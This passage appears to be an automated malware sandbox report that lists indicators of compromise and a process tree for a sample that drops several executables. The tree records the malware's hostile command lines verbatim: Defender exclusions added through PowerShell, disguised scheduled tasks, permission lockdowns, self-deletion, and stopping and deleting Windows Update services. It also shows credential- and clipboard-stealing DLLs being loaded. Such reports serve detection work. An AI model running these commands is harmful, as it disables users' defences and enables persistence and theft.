Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 820074001c0043465346160031000000000000000000100041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004100700070004400610074006100000042000000	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	rundll32.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Explorer.EXE

pid process

3192 Explorer.EXE

pid	process
3192	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

8fa55ca5d2455bb6d249defb06a46d5f7e7b73932cdac04344d5cffbaa9a56b8.exeExplorer.EXE

pid	process
3904	8fa55ca5d2455bb6d249defb06a46d5f7e7b73932cdac04344d5cffbaa9a56b8.exe
3904	8fa55ca5d2455bb6d249defb06a46d5f7e7b73932cdac04344d5cffbaa9a56b8.exe
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE
3192	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3192 Explorer.EXE
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

8fa55ca5d2455bb6d249defb06a46d5f7e7b73932cdac04344d5cffbaa9a56b8.exeDD87.exe

pid process

3904 8fa55ca5d2455bb6d249defb06a46d5f7e7b73932cdac04344d5cffbaa9a56b8.exe
4408 DD87.exe

pid	process
3192	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Explorer.EXEpowershell.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeShutdownPrivilege	3192	Explorer.EXE
Token: SeCreatePagefilePrivilege	3192	Explorer.EXE
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeIncreaseQuotaPrivilege	4416	powershell.exe
Token: SeSecurityPrivilege	4416	powershell.exe
Token: SeTakeOwnershipPrivilege	4416	powershell.exe
Token: SeLoadDriverPrivilege	4416	powershell.exe
Token: SeSystemProfilePrivilege	4416	powershell.exe
Token: SeSystemtimePrivilege	4416	powershell.exe
Token: SeProfSingleProcessPrivilege	4416	powershell.exe
Token: SeIncBasePriorityPrivilege	4416	powershell.exe
Token: SeCreatePagefilePrivilege	4416	powershell.exe
Token: SeBackupPrivilege	4416	powershell.exe
Token: SeRestorePrivilege	4416	powershell.exe
Token: SeShutdownPrivilege	4416	powershell.exe
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeSystemEnvironmentPrivilege	4416	powershell.exe
Token: SeRemoteShutdownPrivilege	4416	powershell.exe
Token: SeUndockPrivilege	4416	powershell.exe
Token: SeManageVolumePrivilege	4416	powershell.exe
Token: 33	4416	powershell.exe
Token: 34	4416	powershell.exe
Token: 35	4416	powershell.exe
Token: 36	4416	powershell.exe
Token: SeShutdownPrivilege	584	powercfg.exe
Token: SeCreatePagefilePrivilege	584	powercfg.exe
Token: SeShutdownPrivilege	1160	powercfg.exe
Token: SeCreatePagefilePrivilege	1160	powercfg.exe
Token: SeShutdownPrivilege	4212	powercfg.exe
Token: SeCreatePagefilePrivilege	4212	powercfg.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exerundll32.exe

pid process

2796 rundll32.exe
3308 rundll32.exe
316 rundll32.exe
3836 rundll32.exe
4768 rundll32.exe
656 rundll32.exe
1824 rundll32.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Explorer.EXE

pid process

3192 Explorer.EXE
3192 Explorer.EXE

pid	process
2796	rundll32.exe
3308	rundll32.exe
316	rundll32.exe
3836	rundll32.exe
4768	rundll32.exe
656	rundll32.exe
1824	rundll32.exe

pid	process
3192	Explorer.EXE
3192	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Explorer.EXEC568.exeC568.exeD22A.exeD44E.exeC568.exeD22A.exe

description	pid	process	target process
PID 3192 wrote to memory of 4548	3192	Explorer.EXE	C568.exe
PID 3192 wrote to memory of 4548	3192	Explorer.EXE	C568.exe
PID 3192 wrote to memory of 4548	3192	Explorer.EXE	C568.exe
PID 4548 wrote to memory of 4956	4548	C568.exe	C568.exe
PID 4548 wrote to memory of 4956	4548	C568.exe	C568.exe
PID 4548 wrote to memory of 4956	4548	C568.exe	C568.exe
PID 4548 wrote to memory of 4956	4548	C568.exe	C568.exe
PID 4548 wrote to memory of 4956	4548	C568.exe	C568.exe
PID 4548 wrote to memory of 4956	4548	C568.exe	C568.exe
PID 4548 wrote to memory of 4956	4548	C568.exe	C568.exe
PID 4548 wrote to memory of 4956	4548	C568.exe	C568.exe
PID 4548 wrote to memory of 4956	4548	C568.exe	C568.exe
PID 4548 wrote to memory of 4956	4548	C568.exe	C568.exe
PID 4956 wrote to memory of 4652	4956	C568.exe	icacls.exe
PID 4956 wrote to memory of 4652	4956	C568.exe	icacls.exe
PID 4956 wrote to memory of 4652	4956	C568.exe	icacls.exe
PID 3192 wrote to memory of 4748	3192	Explorer.EXE	D22A.exe
PID 3192 wrote to memory of 4748	3192	Explorer.EXE	D22A.exe
PID 3192 wrote to memory of 4748	3192	Explorer.EXE	D22A.exe
PID 4956 wrote to memory of 4420	4956	C568.exe	C568.exe
PID 4956 wrote to memory of 4420	4956	C568.exe	C568.exe
PID 4956 wrote to memory of 4420	4956	C568.exe	C568.exe
PID 3192 wrote to memory of 2452	3192	Explorer.EXE	D44E.exe
PID 3192 wrote to memory of 2452	3192	Explorer.EXE	D44E.exe
PID 3192 wrote to memory of 2452	3192	Explorer.EXE	D44E.exe
PID 4748 wrote to memory of 1184	4748	D22A.exe	D22A.exe
PID 4748 wrote to memory of 1184	4748	D22A.exe	D22A.exe
PID 4748 wrote to memory of 1184	4748	D22A.exe	D22A.exe
PID 4748 wrote to memory of 1184	4748	D22A.exe	D22A.exe
PID 4748 wrote to memory of 1184	4748	D22A.exe	D22A.exe
PID 4748 wrote to memory of 1184	4748	D22A.exe	D22A.exe
PID 4748 wrote to memory of 1184	4748	D22A.exe	D22A.exe
PID 4748 wrote to memory of 1184	4748	D22A.exe	D22A.exe
PID 4748 wrote to memory of 1184	4748	D22A.exe	D22A.exe
PID 4748 wrote to memory of 1184	4748	D22A.exe	D22A.exe
PID 2452 wrote to memory of 4820	2452	D44E.exe	D44E.exe
PID 2452 wrote to memory of 4820	2452	D44E.exe	D44E.exe
PID 2452 wrote to memory of 4820	2452	D44E.exe	D44E.exe
PID 2452 wrote to memory of 4820	2452	D44E.exe	D44E.exe
PID 2452 wrote to memory of 4820	2452	D44E.exe	D44E.exe
PID 2452 wrote to memory of 4820	2452	D44E.exe	D44E.exe
PID 2452 wrote to memory of 4820	2452	D44E.exe	D44E.exe
PID 2452 wrote to memory of 4820	2452	D44E.exe	D44E.exe
PID 2452 wrote to memory of 4820	2452	D44E.exe	D44E.exe
PID 2452 wrote to memory of 4820	2452	D44E.exe	D44E.exe
PID 4420 wrote to memory of 4592	4420	C568.exe	C568.exe
PID 4420 wrote to memory of 4592	4420	C568.exe	C568.exe
PID 4420 wrote to memory of 4592	4420	C568.exe	C568.exe
PID 4420 wrote to memory of 4592	4420	C568.exe	C568.exe
PID 4420 wrote to memory of 4592	4420	C568.exe	C568.exe
PID 4420 wrote to memory of 4592	4420	C568.exe	C568.exe
PID 4420 wrote to memory of 4592	4420	C568.exe	C568.exe
PID 4420 wrote to memory of 4592	4420	C568.exe	C568.exe
PID 4420 wrote to memory of 4592	4420	C568.exe	C568.exe
PID 4420 wrote to memory of 4592	4420	C568.exe	C568.exe
PID 3192 wrote to memory of 4408	3192	Explorer.EXE	DD87.exe
PID 3192 wrote to memory of 4408	3192	Explorer.EXE	DD87.exe
PID 3192 wrote to memory of 4408	3192	Explorer.EXE	DD87.exe
PID 3192 wrote to memory of 5044	3192	Explorer.EXE	DF4D.exe
PID 3192 wrote to memory of 5044	3192	Explorer.EXE	DF4D.exe
PID 3192 wrote to memory of 5044	3192	Explorer.EXE	DF4D.exe
PID 1184 wrote to memory of 5028	1184	D22A.exe	D22A.exe
PID 1184 wrote to memory of 5028	1184	D22A.exe	D22A.exe
PID 1184 wrote to memory of 5028	1184	D22A.exe	D22A.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Deletes itself
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3192
- C:\Users\Admin\AppData\Local\Temp\8fa55ca5d2455bb6d249defb06a46d5f7e7b73932cdac04344d5cffbaa9a56b8.exe
  "C:\Users\Admin\AppData\Local\Temp\8fa55ca5d2455bb6d249defb06a46d5f7e7b73932cdac04344d5cffbaa9a56b8.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3904
- C:\Users\Admin\AppData\Local\Temp\C568.exe
  C:\Users\Admin\AppData\Local\Temp\C568.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4548
- - C:\Users\Admin\AppData\Local\Temp\C568.exe
    C:\Users\Admin\AppData\Local\Temp\C568.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:4956
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Users\Admin\AppData\Local\cbc2b594-c459-4921-989f-4783fe6325ae" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      4⤵
      Modifies file permissions
      PID:4652
  - - C:\Users\Admin\AppData\Local\Temp\C568.exe
      "C:\Users\Admin\AppData\Local\Temp\C568.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:4420
    - - C:\Users\Admin\AppData\Local\Temp\C568.exe
        
        "C:\Users\Admin\AppData\Local\Temp\C568.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        Executes dropped EXE
        
        PID:4592
      - C:\Users\Admin\AppData\Local\a3361d79-3e83-44a1-8584-fca8f81fbd63\build2.exe
        
        "C:\Users\Admin\AppData\Local\a3361d79-3e83-44a1-8584-fca8f81fbd63\build2.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4092
        
        C:\Users\Admin\AppData\Local\a3361d79-3e83-44a1-8584-fca8f81fbd63\build2.exe
        
        "C:\Users\Admin\AppData\Local\a3361d79-3e83-44a1-8584-fca8f81fbd63\build2.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:208
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\a3361d79-3e83-44a1-8584-fca8f81fbd63\build2.exe" & exit
        8⤵
        
        PID:204
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:2300
      - C:\Users\Admin\AppData\Local\a3361d79-3e83-44a1-8584-fca8f81fbd63\build3.exe
        
        "C:\Users\Admin\AppData\Local\a3361d79-3e83-44a1-8584-fca8f81fbd63\build3.exe"
        6⤵
        Executes dropped EXE
        
        PID:1216
        
        C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        7⤵
        Creates scheduled task(s)
        
        PID:1700
- C:\Users\Admin\AppData\Local\Temp\D22A.exe
  C:\Users\Admin\AppData\Local\Temp\D22A.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4748
- - C:\Users\Admin\AppData\Local\Temp\D22A.exe
    C:\Users\Admin\AppData\Local\Temp\D22A.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1184
  - - C:\Users\Admin\AppData\Local\Temp\D22A.exe
      "C:\Users\Admin\AppData\Local\Temp\D22A.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:5028
    - - C:\Users\Admin\AppData\Local\Temp\D22A.exe
        
        "C:\Users\Admin\AppData\Local\Temp\D22A.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        Executes dropped EXE
        
        PID:3380
      - C:\Users\Admin\AppData\Local\130bb42b-377d-4ade-a598-cda7d021caa3\build2.exe
        
        "C:\Users\Admin\AppData\Local\130bb42b-377d-4ade-a598-cda7d021caa3\build2.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:864
        
        C:\Users\Admin\AppData\Local\130bb42b-377d-4ade-a598-cda7d021caa3\build2.exe
        
        "C:\Users\Admin\AppData\Local\130bb42b-377d-4ade-a598-cda7d021caa3\build2.exe"
        7⤵
        Executes dropped EXE
        
        PID:2752
      - C:\Users\Admin\AppData\Local\130bb42b-377d-4ade-a598-cda7d021caa3\build3.exe
        
        "C:\Users\Admin\AppData\Local\130bb42b-377d-4ade-a598-cda7d021caa3\build3.exe"
        6⤵
        Executes dropped EXE
        
        PID:4444
- C:\Users\Admin\AppData\Local\Temp\D44E.exe
  C:\Users\Admin\AppData\Local\Temp\D44E.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2452
- - C:\Users\Admin\AppData\Local\Temp\D44E.exe
    C:\Users\Admin\AppData\Local\Temp\D44E.exe
    3⤵
    - Executes dropped EXE
    PID:4820
  - - C:\Users\Admin\AppData\Local\Temp\D44E.exe
      "C:\Users\Admin\AppData\Local\Temp\D44E.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:4720
    - - C:\Users\Admin\AppData\Local\Temp\D44E.exe
        
        "C:\Users\Admin\AppData\Local\Temp\D44E.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        Executes dropped EXE
        
        PID:4992
      - C:\Users\Admin\AppData\Local\b90fcb1c-32fd-4765-915a-70db59fdd709\build2.exe
        
        "C:\Users\Admin\AppData\Local\b90fcb1c-32fd-4765-915a-70db59fdd709\build2.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\b90fcb1c-32fd-4765-915a-70db59fdd709\build2.exe
        
        "C:\Users\Admin\AppData\Local\b90fcb1c-32fd-4765-915a-70db59fdd709\build2.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2712
      - C:\Users\Admin\AppData\Local\b90fcb1c-32fd-4765-915a-70db59fdd709\build3.exe
        
        "C:\Users\Admin\AppData\Local\b90fcb1c-32fd-4765-915a-70db59fdd709\build3.exe"
        6⤵
        Executes dropped EXE
        
        PID:2652
- C:\Users\Admin\AppData\Local\Temp\DD87.exe
  C:\Users\Admin\AppData\Local\Temp\DD87.exe
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:4408
- C:\Users\Admin\AppData\Local\Temp\DF4D.exe
  C:\Users\Admin\AppData\Local\Temp\DF4D.exe
  2⤵
  - Executes dropped EXE
  PID:5044
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 476
    3⤵
    - Program crash
    PID:4272
- C:\Users\Admin\AppData\Local\Temp\6259.exe
  C:\Users\Admin\AppData\Local\Temp\6259.exe
  2⤵
  - Executes dropped EXE
  PID:168
- - C:\Users\Admin\AppData\Local\Temp\Player3.exe
    "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
    3⤵
    - Executes dropped EXE
    PID:1028
  - - C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
      "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"
      4⤵
      Executes dropped EXE
      PID:4480
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:2080
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit
        5⤵
        
        PID:2084
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:4808
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nbveek.exe" /P "Admin:N"
        6⤵
        
        PID:4812
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nbveek.exe" /P "Admin:R" /E
        6⤵
        
        PID:4416
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:4508
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\16de06bfb4" /P "Admin:N"
        6⤵
        
        PID:4380
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\16de06bfb4" /P "Admin:R" /E
        6⤵
        
        PID:1860
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:1784
      - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
        6⤵
        Loads dropped DLL
        
        PID:2032
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2032 -s 600
        7⤵
        Program crash
        
        PID:908
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:32
- - C:\Users\Admin\AppData\Local\Temp\ss31.exe
    "C:\Users\Admin\AppData\Local\Temp\ss31.exe"
    3⤵
    - Executes dropped EXE
    PID:1788
- - C:\Users\Admin\AppData\Local\Temp\XandETC.exe
    "C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:4456
- C:\Users\Admin\AppData\Local\Temp\6D08.exe
  C:\Users\Admin\AppData\Local\Temp\6D08.exe
  2⤵
  - Executes dropped EXE
  PID:2756
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 780
    3⤵
    - Program crash
    PID:2264
- C:\Users\Admin\AppData\Local\Temp\B925.exe
  C:\Users\Admin\AppData\Local\Temp\B925.exe
  2⤵
  - Executes dropped EXE
  PID:1608
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Uieiuateoq.dll,start
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Checks processor information in registry
    PID:2232
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 19212
      4⤵
      Modifies registry class
      Suspicious use of FindShellTrayWindow
      PID:2796
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 19212
      4⤵
      Modifies registry class
      Suspicious use of FindShellTrayWindow
      PID:3308
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 19212
      4⤵
      Modifies registry class
      Suspicious use of FindShellTrayWindow
      PID:316
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 19212
      4⤵
      Modifies registry class
      Suspicious use of FindShellTrayWindow
      PID:3836
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 19212
      4⤵
      Modifies registry class
      Suspicious use of FindShellTrayWindow
      PID:4768
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 19212
      4⤵
      Modifies registry class
      Suspicious use of FindShellTrayWindow
      PID:656
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 19212
      4⤵
      Suspicious use of FindShellTrayWindow
      PID:1824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4416
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1132
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:584
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1160
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4212
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:2128
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:4372
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1628
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1820
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2032
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2132
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:376
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:2656
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:3880
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:316
